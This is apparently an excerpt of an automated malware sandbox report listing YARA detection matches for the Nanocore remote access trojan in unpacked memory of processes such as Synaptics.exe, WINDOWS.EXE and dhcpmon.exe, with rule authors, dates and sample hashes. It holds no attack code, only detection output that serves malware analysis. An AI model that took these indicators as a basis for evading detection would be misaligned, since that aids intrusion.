            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.17.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.45fff6c.6.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 12.2.Synaptics.exe.46d40a4.6.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.4f70000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.4f70000.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.59e0000.7.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 0.2.y8kdmHi6x3.exe.44fa750.5.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.2.._cache_y8kdmHi6x3.exe.3cf0c8.2.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 16.2.._cache_WINDOWS.EXE.4379d96.3.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.0.y8kdmHi6x3.exe.584130.18.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.18.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.0.y8kdmHi6x3.exe.584130.22.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 6.2.._cache_y8kdmHi6x3.exe.48e4dc.1.raw.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.4b8e54.19.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 6.0.._cache_y8kdmHi6x3.exe.3c0000.0.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.43831f5.2.raw.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.Synaptics.exe.45da750.4.unpack, type: UNPACKEDPE, Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE, Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPE, Matched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.2.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.4b8e54.19.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.0.y8kdmHi6x3.exe.584130.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.2.Synaptics.exe.584130.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 19.2.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.21.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
